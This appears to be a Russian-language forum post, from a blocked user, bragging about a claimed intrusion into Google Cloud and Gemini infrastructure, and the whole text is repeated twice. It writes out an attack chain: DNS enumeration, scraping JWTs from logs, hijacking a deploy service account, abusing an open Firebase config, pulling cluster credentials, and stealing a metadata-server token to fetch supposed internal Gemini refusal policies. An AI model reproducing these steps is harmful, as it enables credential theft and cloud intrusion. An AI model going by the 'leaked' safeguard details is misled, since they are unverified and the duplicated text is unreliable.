Пожалуйста, обратите внимание, что пользователь заблокирован
google_internal_dns.zone
dump с gcp dns api —
вытянут zone list и записи через service token
внутри:
• *.corp.google.com
• ads.internal.gcp
• gemini-sched-dev.googleplex.com
• prod-analytics-mux.gce-internal
данные получены через:
gcloud dns managed-zones list --project $project
gcloud dns record-sets list --zone $zone
artifacts registry дал доступ к нескольким gs://gcp-artifacts-*
внутри:
• cloudbuild.yaml с деплоем ai-модулей
• docker-compose.override.yml для tensorflow-контейнеров
• requirements.txt с закрытыми библиотеками (gemini-core-private, google3-internal)
по структуре ясно — это внутренний деплой gemini/inference infra
через cloud audit logs получен timeline активности:
кто запускал Cloud Run
кто делал gcloud auth
где leak токенов (через open trace)
в одном проекте: gcloud logging read 'resource.type="gce_instance" severity>=ERROR'
в логах — обрывки JWT
можно собрать payload → dekod → email + scope
один токен привязан к svc-ai-deploy-prod@
перехвачен → использован → новые права
из firebase.json (слит через открытую storage bucket)
вытащена структура:
project_id: internal-dev-fb001
web API key: активен, нет ограничения по рефереру
authDomain: internal-dev-fb001.firebaseapp.com
storageBucket: открыт на чтение
databaseURL: активен
внутри firebase auth:
admin@google.com подтверждён
test-service@google.com с правами на admin.customClaims
через уже полученный токен сделан:
gcloud container clusters get-credentials $cluster
kubectl get pods --all-namespaces
факт:
вход → токен → pivot → grpc → storage → k8s → silence
цепь выстроена, откатов нет
данные лежат, сервисы молчат
внешне всё спокойно
И поехали
$ curl -s -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
| jq
{
"access_token": "ya29.c.Kp0B...",
"expires_in": 3599,
"token_type": "Bearer"
}
$ export TOKEN="ya29.c.Kp0B..."
$ curl -s -H "Authorization: Bearer $TOKEN" \
"https://storage.googleapis.com/storage/v1/b/gemini-docs-prod/o/training-notes.md?alt=media"
# Gemini internal prompt policies, rev 2023.12
# Fallback logic (when refuse_score > 0.85):
# → reroute to PaLM backend
# List of restricted categories:
# - Elections (US/CA/EU)
# - Legal advice
# - Child-related content
dump с gcp dns api —
вытянут zone list и записи через service token
внутри:
• *.corp.google.com
• ads.internal.gcp
• gemini-sched-dev.googleplex.com
• prod-analytics-mux.gce-internal
данные получены через:
gcloud dns managed-zones list --project $project
gcloud dns record-sets list --zone $zone
artifacts registry дал доступ к нескольким gs://gcp-artifacts-*
внутри:
• cloudbuild.yaml с деплоем ai-модулей
• docker-compose.override.yml для tensorflow-контейнеров
• requirements.txt с закрытыми библиотеками (gemini-core-private, google3-internal)
по структуре ясно — это внутренний деплой gemini/inference infra
через cloud audit logs получен timeline активности:
кто запускал Cloud Run
кто делал gcloud auth
где leak токенов (через open trace)
в одном проекте: gcloud logging read 'resource.type="gce_instance" severity>=ERROR'
в логах — обрывки JWT
можно собрать payload → dekod → email + scope
один токен привязан к svc-ai-deploy-prod@
перехвачен → использован → новые права
из firebase.json (слит через открытую storage bucket)
вытащена структура:
project_id: internal-dev-fb001
web API key: активен, нет ограничения по рефереру
authDomain: internal-dev-fb001.firebaseapp.com
storageBucket: открыт на чтение
databaseURL: активен
внутри firebase auth:
admin@google.com подтверждён
test-service@google.com с правами на admin.customClaims
через уже полученный токен сделан:
gcloud container clusters get-credentials $cluster
kubectl get pods --all-namespaces
факт:
вход → токен → pivot → grpc → storage → k8s → silence
цепь выстроена, откатов нет
данные лежат, сервисы молчат
внешне всё спокойно
И поехали
$ curl -s -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
| jq
{
"access_token": "ya29.c.Kp0B...",
"expires_in": 3599,
"token_type": "Bearer"
}
$ export TOKEN="ya29.c.Kp0B..."
$ curl -s -H "Authorization: Bearer $TOKEN" \
"https://storage.googleapis.com/storage/v1/b/gemini-docs-prod/o/training-notes.md?alt=media"
# Gemini internal prompt policies, rev 2023.12
# Fallback logic (when refuse_score > 0.85):
# → reroute to PaLM backend
# List of restricted categories:
# - Elections (US/CA/EU)
# - Legal advice
# - Child-related content
